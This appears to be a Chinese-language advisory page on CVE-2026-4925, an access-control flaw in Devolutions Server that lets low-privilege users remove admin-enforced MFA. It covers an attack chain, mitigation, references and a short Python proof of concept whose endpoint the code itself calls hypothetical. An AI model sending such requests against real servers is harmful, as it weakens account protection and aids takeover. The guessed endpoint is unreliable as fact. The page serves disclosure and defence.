CVE-2026-4925 Devolutions Server访问控制缺陷

漏洞信息

漏洞编号

CVE-2026-4925

漏洞类型

访问控制缺陷

CVSS评分

5.0 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Devolutions Server

漏洞概述

Devolutions Server在用户MFA功能中存在不当的访问控制漏洞。经过身份验证的用户可以利用此漏洞，绕过管理员强制执行的安全限制，通过精心构造的请求移除自身账户的多因素认证（MFA）配置，从而降低了账户的安全性。

技术细节

该漏洞是由于Devolutions Server在处理用户多因素认证（MFA）相关接口时，未正确实施权限校验逻辑导致的。在受影响版本（2026.1.6至2026.1.11）中，尽管管理员可能强制启用了MFA策略，但系统允许已认证的普通用户直接调用特定的内部接口或API端点。攻击者只需拥有一个有效的低权限账户登录凭证，即可构造恶意HTTP请求（通常是POST或DELETE请求），指向负责管理MFA的路径。由于服务器端缺乏对“是否允许用户自行移除MFA”这一策略的二次验证，该请求被成功处理，导致绑定的MFA设备被解绑。这种逻辑漏洞使得攻击者能够规避双重认证保护，为后续的账户接管或横向移动创造条件。

攻击链分析

STEP 1

1. 信息收集

攻击者确定目标系统运行的是Devolutions Server，且版本在受影响范围内（2026.1.6 - 2026.1.11）。

STEP 2

2. 获取访问权限

攻击者通过钓鱼或凭证泄露等方式，获取一个普通用户（低权限）的账户凭证并成功登录系统。

STEP 3

3. 发送恶意请求

攻击者利用已登录的会话，构造特定的HTTP请求发送至服务器，意图调用移除MFA的内部接口。

STEP 4

4. 绕过安全限制

由于服务器存在访问控制缺陷，未校验用户是否有权移除MFA，直接执行了该操作，成功解除了账户的多因素认证。

STEP 5

5. 后续利用

MFA被移除后，攻击者可以使用窃取的密码直接登录该账户，无需第二重验证，进而可能进行提权或横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-4925: Devolutions Server MFA Bypass
# Description: This script demonstrates how an authenticated user can remove their own MFA
# by sending a crafted request to the vulnerable endpoint.

def exploit_mfa_removal(target_url, session_token):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Authorization": f"Bearer {session_token}",
        "Content-Type": "application/json"
    }
    
    # Hypothetical endpoint based on the vulnerability description
    api_endpoint = f"{target_url}/api/v1/users/me/mfa/disable"
    
    payload = {
        "provider": "totp",
        "confirmation": "true"
    }

    try:
        response = requests.post(api_endpoint, json=payload, headers=headers, verify=False)
        if response.status_code == 200:
            print("[+] Success: MFA configuration removed via access control bypass.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed: Server returned status code {response.status_code}")
    except Exception as e:
        print(f"[!] Error occurred: {e}")

# Usage example:
# exploit_mfa_removal("https://devolutions-server.example.com", "<valid_user_session_token>")

影响范围

2026.1.6

2026.1.7

2026.1.8

2026.1.9

2026.1.10

2026.1.11

防御指南

临时缓解措施

建议管理员立即将Devolutions Server升级到修复了该漏洞的最新版本。在升级之前，应严格审查用户权限，并通过日志监控是否有用户尝试移除MFA配置的行为，必要时可暂时禁用受影响用户账户或强制要求重置密码。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4925
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4925
3 Details https://www.cvedetails.com/cve/CVE-2026-4925/
4 VulDB https://vuldb.com/cve/CVE-2026-4925
5 Link https://devolutions.net/security/advisories/DEVO-2026-0010